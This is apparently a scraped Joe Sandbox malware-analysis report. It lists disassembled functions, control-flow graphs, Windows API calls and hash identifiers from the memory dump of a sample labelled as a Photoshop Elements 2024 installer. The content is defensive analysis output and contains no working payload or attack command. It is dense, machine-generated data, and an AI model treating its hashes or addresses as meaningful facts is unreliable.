                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __freea$AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 2243444508-0
                                                                                                        • Opcode ID: e7769c107ffec29248e460088ae0cedb9c08108200986b85009b7471b4479d1a
                                                                                                        • Instruction ID: 765d7a539741e6f4e8992cbd8a73dce42bcbe682ff12dd95e285c18345c69960
                                                                                                        • Opcode Fuzzy Hash: e7769c107ffec29248e460088ae0cedb9c08108200986b85009b7471b4479d1a
                                                                                                        • Instruction Fuzzy Hash: C9519E7260021AABEF219FA48C55EBB3FA9FB84750F154529FD18B7140EB70DC5197A0

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 506 53b0fc-53b118 507 53b2cf 506->507 508 53b11e-53b120 506->508 509 53b2d1-53b2d5 507->509 510 53b142-53b163 508->510 511 53b122-53b135 call 528e0e call 528e21 call 5215d8 508->511 512 53b165-53b168 510->512 513 53b16a-53b170 510->513 529 53b13a-53b13d 511->529 512->513 515 53b175-53b17a 512->515 513->511 516 53b172 513->516 518 53b18b-53b194 call 53aca3 515->518 519 53b17c-53b183 call 53c248 515->519 516->515 527 53b196-53b198 518->527 528 53b1cf-53b1e1 518->528 524 53b188 519->524 524->518 532 53b19a-53b19f 527->532 533 53b1bc-53b1c5 call 53a88f 527->533 530 53b1e3-53b1e9 528->530 531 53b229-53b24a WriteFile 528->531 529->509 537 53b1eb-53b1ee 530->537 538 53b219-53b222 call 53ad14 530->538 534 53b255 531->534 535 53b24c-53b252 GetLastError 531->535 539 53b1a5-53b1b2 call 53ac3b 532->539 540 53b299-53b2ab 532->540 543 53b1ca-53b1cd 533->543 544 53b258-53b263 534->544 535->534 545 53b1f0-53b1f3 537->545 546 53b209-53b217 call 53aed8 537->546 556 53b227 538->556 550 53b1b5-53b1b7 539->550 541 53b2b2-53b2c5 call 528e21 call 528e0e 540->541 542 53b2ad-53b2b0 540->542 541->529 542->507 542->541 543->550 551 53b265-53b26a 544->551 552 53b2ca-53b2cd 544->552 545->540 553 53b1f9-53b207 call 53adef 545->553 546->543 550->544 558 53b296 551->558 559 53b26c-53b271 551->559 552->509 553->543 556->543 558->540 563 53b273-53b285 call 528e21 call 528e0e 559->563 564 53b28a-53b291 call 528deb 559->564 563->529 564->529
                                                                                                        APIs
                                                                                                          • Part of subcall function 0053A88F: GetConsoleOutputCP.KERNEL32(00000000,?,?), ref: 0053A8D7
                                                                                                        • WriteFile.KERNEL32(?,00000000,00000000,0052DF68,00000000,?,?,?), ref: 0053B242
                                                                                                        • GetLastError.KERNEL32 ref: 0053B24C
                                                                                                        • __dosmaperr.LIBCMT ref: 0053B28B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConsoleErrorFileLastOutputWrite__dosmaperr
                                                                                                        • String ID:
                                                                                                        • API String ID: 910155933-0
                                                                                                        • Opcode ID: 6354150f582f36f167f4209af027d52f1e74aae61fb994249a8da41b3140e0c3
                                                                                                        • Instruction ID: c641f04ef73c6a00273834d4e4e200a35c282e27166637603b3893b708bc9dbd
                                                                                                        • Opcode Fuzzy Hash: 6354150f582f36f167f4209af027d52f1e74aae61fb994249a8da41b3140e0c3
                                                                                                        • Instruction Fuzzy Hash: 9F51DD75E0020AABEB119FE8C819BEEBFB9FF86310F140555F604AB291D734DA41DB61

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 573 53c1b1-53c1c9 call 52a93f 576 53c1cb-53c1d0 call 528e21 573->576 577 53c1dc-53c1f2 SetFilePointerEx 573->577 583 53c1d6-53c1da 576->583 579 53c203-53c20d 577->579 580 53c1f4-53c201 GetLastError call 528deb 577->580 579->583 584 53c20f-53c224 579->584 580->583 585 53c229-53c22c 583->585 584->585
                                                                                                        APIs
                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,00000000,?,00000000,00000000,?,0053C25E,?,?,00000002,00000000), ref: 0053C1EA
                                                                                                        • GetLastError.KERNEL32(?,0053C25E,?,?,00000002,00000000,?,0053B188,?,00000000,00000000,00000002,?,?,?), ref: 0053C1F4
                                                                                                        • __dosmaperr.LIBCMT ref: 0053C1FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                        • String ID:
                                                                                                        • API String ID: 2336955059-0
                                                                                                        • Opcode ID: da4ad7f9978ecf8d851527b14469328b6e03555760f6df4ef6cceec6fbd22151
                                                                                                        • Instruction ID: d45f9b89e2b8778c3d9408f41ce6ede33e1af3a02e67e66b2ed42a8c9bdf8dcd
                                                                                                        • Opcode Fuzzy Hash: da4ad7f9978ecf8d851527b14469328b6e03555760f6df4ef6cceec6fbd22151
                                                                                                        • Instruction Fuzzy Hash: DC01D436610525AFCB099F99EC098AE3F29FF86720F240609F811AB1D1EA70ED419B90

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 587 53ebaf-53ebd1 588 53ece3-53ecea 587->588 589 53ebd7-53ebe9 GetCPInfo 587->589 591 53ecec-53ecf5 588->591 589->588 590 53ebef-53ebf6 589->590 592 53ebf8-53ec02 590->592 593 53ed01-53ed04 591->593 594 53ecf7-53ecff 591->594 592->592 598 53ec04-53ec17 592->598 596 53ed12 593->596 597 53ed06-53ed10 593->597 595 53ed14-53ed1e 594->595 595->591 599 53ed20-53ed2e call 510a46 595->599 596->595 597->595 600 53ec38-53ec3a 598->600 602 53ec19-53ec20 600->602 603 53ec3c-53ec73 call 53d096 call 53c487 600->603 606 53ec2f-53ec31 602->606 612 53ec78-53eca3 call 53c487 603->612 608 53ec33-53ec36 606->608 609 53ec22-53ec24 606->609 608->600 609->608 611 53ec26-53ec2e 609->611 611->606 615 53eca5-53ecb0 612->615 616 53ecb2-53ecbe 615->616 617 53ecc0-53ecc3 615->617 618 53ecd5-53ecdf 616->618 619 53ecd3 617->619 620 53ecc5-53ecd1 617->620 618->615 621 53ece1 618->621 619->618 620->618 621->599
                                                                                                        APIs
                                                                                                        • GetCPInfo.KERNEL32(0000FDE9,?,?,?,00000000), ref: 0053EBE1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Info
                                                                                                        • String ID:
                                                                                                        • API String ID: 1807457897-3916222277
                                                                                                        • Opcode ID: 8394b2ee021e3648cb74d972097f0bbfc78c98b8a837574954af17a2161b7eef
                                                                                                        • Instruction ID: 45504a3321acb57acee90b872999264e8818070311f55d04c384b1e8a60e9fd3
                                                                                                        • Opcode Fuzzy Hash: 8394b2ee021e3648cb74d972097f0bbfc78c98b8a837574954af17a2161b7eef
                                                                                                        • Instruction Fuzzy Hash: F141287050429C9BDB218A68CD9ABFB7FFDBB45304F2418ADE58A87083D235AD45DB20

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 622 51307e-513096 623 5130c5-5130e7 KiUserExceptionDispatcher 622->623 624 513098-51309b 622->624 625 5130bb-5130be 624->625 626 51309d-5130b9 624->626 625->623 627 5130c0 625->627 626->623 626->625 627->623
                                                                                                        APIs
                                                                                                        • KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,00000000,00000000,?,?,00500938,00000000,0069DBAC,00000018,00000000,00000018,?), ref: 005130DE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DispatcherExceptionUser
                                                                                                        • String ID: 8P
                                                                                                        • API String ID: 6842923-1871742855
                                                                                                        • Opcode ID: 47f9e6877d032098ca2c3104a7569322c57065d22971bcbe9053023fb26e3e9f
                                                                                                        • Instruction ID: 5a8b6a534a297f71d25dde9c3705d17a6703b51146409715525ec3a7279bceb2
                                                                                                        • Opcode Fuzzy Hash: 47f9e6877d032098ca2c3104a7569322c57065d22971bcbe9053023fb26e3e9f
                                                                                                        • Instruction Fuzzy Hash: C801DF39900208AFDB019F6CD884B9EBFF8FF48300F01409AE901AB3A0D771AE40CB90

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 630 53ef3e-53ef63 call 53ead9 633 53f119-53f11a call 53eb4a 630->633 634 53ef69-53ef6f 630->634 637 53f11f-53f121 633->637 636 53ef72-53ef78 634->636 638 53f071-53f090 call 513670 636->638 639 53ef7e-53ef8a 636->639 641 53f122-53f130 call 510a46 637->641 648 53f093-53f098 638->648 639->636 642 53ef8c-53ef92 639->642 645 53f069-53f06c 642->645 646 53ef98-53efa4 IsValidCodePage 642->646 645->641 646->645 647 53efaa-53efb1 646->647 650 53efb3-53efbf 647->650 651 53efd9-53efe6 GetCPInfo 647->651 652 53f09a-53f09f 648->652 653 53f0cf-53f0d9 648->653 654 53efc3-53efcf call 53ebaf 650->654 656 53efe8-53f007 call 513670 651->656 657 53f05d-53f063 651->657 658 53f0a1-53f0a7 652->658 659 53f0cc 652->659 653->648 655 53f0db-53f102 call 53ea9b 653->655 664 53efd4 654->664 669 53f103-53f112 655->669 656->654 670 53f009-53f010 656->670 657->633 657->645 663 53f0c0-53f0c2 658->663 659->653 667 53f0c4-53f0ca 663->667 668 53f0a9-53f0af 663->668 664->637 667->652 667->659 668->667 671 53f0b1-53f0bc 668->671 669->669 672 53f114 669->672 673 53f033-53f036 670->673 674 53f012-53f017 670->674 671->663 672->633 675 53f03b-53f042 673->675 674->673 676 53f019-53f01f 674->676 675->675 677 53f044-53f058 call 53ea9b 675->677 678 53f027-53f029 676->678 677->654 680 53f021-53f026 678->680 681 53f02b-53f031 678->681 680->678 681->673 681->674
                                                                                                        APIs
                                                                                                          • Part of subcall function 0053EAD9: GetOEMCP.KERNEL32(00000000,0053ED4A,?,00000000,0053C9D9,0053C9D9,00000000,00000000,?), ref: 0053EB04
                                                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000,?,?,0053ED91,00000000,00000000,?,?,00000000,?,?,?,0053C9D9), ref: 0053EF9C
                                                                                                        • GetCPInfo.KERNEL32(00000000,0053ED91,?,?,0053ED91,00000000,00000000,?,?,00000000,?,?,?,0053C9D9,00000000,00000000), ref: 0053EFDE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CodeInfoPageValid
                                                                                                        • String ID:
                                                                                                        • API String ID: 546120528-0
                                                                                                        • Opcode ID: be1bf1744c19df72fe5e9cf0fa2b1521126257acecde488012fca38d3aaa21ec
                                                                                                        • Instruction ID: b0b1a440e2a254eb330f4f114c0f0a8bbedc175b46fe235f384f4901a2123570
                                                                                                        • Opcode Fuzzy Hash: be1bf1744c19df72fe5e9cf0fa2b1521126257acecde488012fca38d3aaa21ec
                                                                                                        • Instruction Fuzzy Hash: C3512170E002459EDB259F79C88A6BABFE5FF81304F14447ED0878B292E7B59946CB90

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 683 2e5f40-2e5f4d 684 2e5f4f 683->684 685 2e5f6d-2e5f99 call 510a59 683->685 686 2e5f52-2e5f56 684->686 692 2e5f9b-2e5fa1 685->692 688 2e5f58-2e5f61 686->688 689 2e5f63-2e5f67 686->689 688->686 688->689 689->685 691 2e5f69-2e5f6b 689->691 691->685 691->692 693 2e5fed-2e5ff1 692->693 694 2e5fa3-2e5faf 692->694 695 2e5fd5-2e5feb 694->695 696 2e5fb1-2e5fba 694->696 695->693 695->694 697 2e5fbc-2e5fcd call 52d043 696->697 698 2e5ff4 call 209490 696->698 701 2e5ff9-2e601e call 5008bf 697->701 704 2e5fcf-2e5fd2 697->704 698->701 706 2e6022-2e6028 call 5213c3 701->706 707 2e6020 701->707 704->695 709 2e602d-2e6032 706->709 707->706 710 2e6054-2e6066 call 510a46 709->710 711 2e6034-2e6053 call 510a46 709->711
                                                                                                        APIs
                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 002E5FF4
                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 002E5FF9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::cancel_current_task
                                                                                                        • String ID:
                                                                                                        • API String ID: 118556049-0
                                                                                                        • Opcode ID: af9afdcc12758aa22874db6be7dcc15b2012d22626977cb78d2302ea993403a6
                                                                                                        • Instruction ID: 1ec8745075e4cfb003309054580fecd98795bbf81331c1027c72dcfa49a57585
                                                                                                        • Opcode Fuzzy Hash: af9afdcc12758aa22874db6be7dcc15b2012d22626977cb78d2302ea993403a6
                                                                                                        • Instruction Fuzzy Hash: 9841DF725107228FCB20DF15D881A5AB7E5FF85324F55852AE8688BB91E731F860CBA1

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 716 53ed2f-53ed59 call 53ee43 call 53ead9 721 53ed5b-53ed5e 716->721 722 53ed5f-53ed74 call 535db3 716->722 725 53ed76-53ed8c call 53ef3e 722->725 726 53eda4 722->726 729 53ed91-53ed97 725->729 728 53eda6-53edb3 call 535d79 726->728 731 53edb4-53edb8 729->731 732 53ed99-53ed9e call 528e21 729->732 734 53edba call 534971 731->734 735 53edbf-53edca 731->735 732->726 734->735 738 53ede1-53edff 735->738 739 53edcc-53edd6 735->739 738->728 742 53ee01-53ee2e call 53e9cb 738->742 739->738 741 53edd8-53ede0 call 535d79 739->741 741->738 742->728 747 53ee34-53ee3e 742->747 747->728
                                                                                                        APIs
                                                                                                          • Part of subcall function 0053EAD9: GetOEMCP.KERNEL32(00000000,0053ED4A,?,00000000,0053C9D9,0053C9D9,00000000,00000000,?), ref: 0053EB04
                                                                                                        • _free.LIBCMT ref: 0053EDA7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID:
                                                                                                        • API String ID: 269201875-0
                                                                                                        • Opcode ID: 5725add10e8a4eca8d8861dec0e5344cfdb912ef97206faec7f44ef3694869d0
                                                                                                        • Instruction ID: 9f1726160b123360c447ac73d0c4f7a5ed9af419e1aebf4d53c1ba6ed6c8c810
                                                                                                        • Opcode Fuzzy Hash: 5725add10e8a4eca8d8861dec0e5344cfdb912ef97206faec7f44ef3694869d0
                                                                                                        • Instruction Fuzzy Hash: 4E318F7290020AAFCB11DFA8D846ADA7BF5FF85310F15046AF8119B2A1EB71AE50CF50

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 748 53ad14-53ad69 call 511db0 751 53ad6b 748->751 752 53adde-53adee call 510a46 748->752 754 53ad71 751->754 755 53ad77-53ad79 754->755 757 53ad93-53adb8 WriteFile 755->757 758 53ad7b-53ad80 755->758 761 53add6-53addc GetLastError 757->761 762 53adba-53adc5 757->762 759 53ad82-53ad88 758->759 760 53ad89-53ad91 758->760 759->760 760->755 760->757 761->752 762->752 763 53adc7-53add2 762->763 763->754 764 53add4 763->764 764->752
                                                                                                        APIs
                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,0053B227,00000000,?,00000000,00000000,?,?), ref: 0053ADB0
                                                                                                        • GetLastError.KERNEL32(?,0053B227,00000000,?,00000000,00000000,?,?,?), ref: 0053ADD6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 442123175-0
                                                                                                        • Opcode ID: 1ba287a7e37e20eefbf1bbc6274970e18c2d18bbdec53e57c51497e17d9e5203
                                                                                                        • Instruction ID: ebbb278ded6bff5cee8f418e93147179c085d173b11104d5f822b284689a796d
                                                                                                        • Opcode Fuzzy Hash: 1ba287a7e37e20eefbf1bbc6274970e18c2d18bbdec53e57c51497e17d9e5203
                                                                                                        • Instruction Fuzzy Hash: 8A21A374A002199BCF19CF29DC809E9BBBAFF49302F1445A9EA46D7211D730DD86CFA5
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(0069F330,0000000C), ref: 0052E46E
                                                                                                        • RtlExitUserThread.NTDLL(00000000), ref: 0052E475
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorExitLastThreadUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 1750398979-0
                                                                                                        • Opcode ID: eee2b43fa5e2b50ba30df55046165929671712563a59f14a20b13f28fcdbfa80
                                                                                                        • Instruction ID: 60d55e14dc70df09563e2ed97e53b521b563885f9eb7c7f1fe73d393b2decd45
                                                                                                        • Opcode Fuzzy Hash: eee2b43fa5e2b50ba30df55046165929671712563a59f14a20b13f28fcdbfa80
                                                                                                        • Instruction Fuzzy Hash: 18F0A970A40206AFEF05BBB0E84FA6E3F74FF82710F10455AF4019B292DB746A01DBA0
                                                                                                        APIs
                                                                                                        • LCMapStringEx.KERNEL32(?,0053C389,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00538185
                                                                                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,0053C389,?,?,00000000,?,00000000), ref: 005381A3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
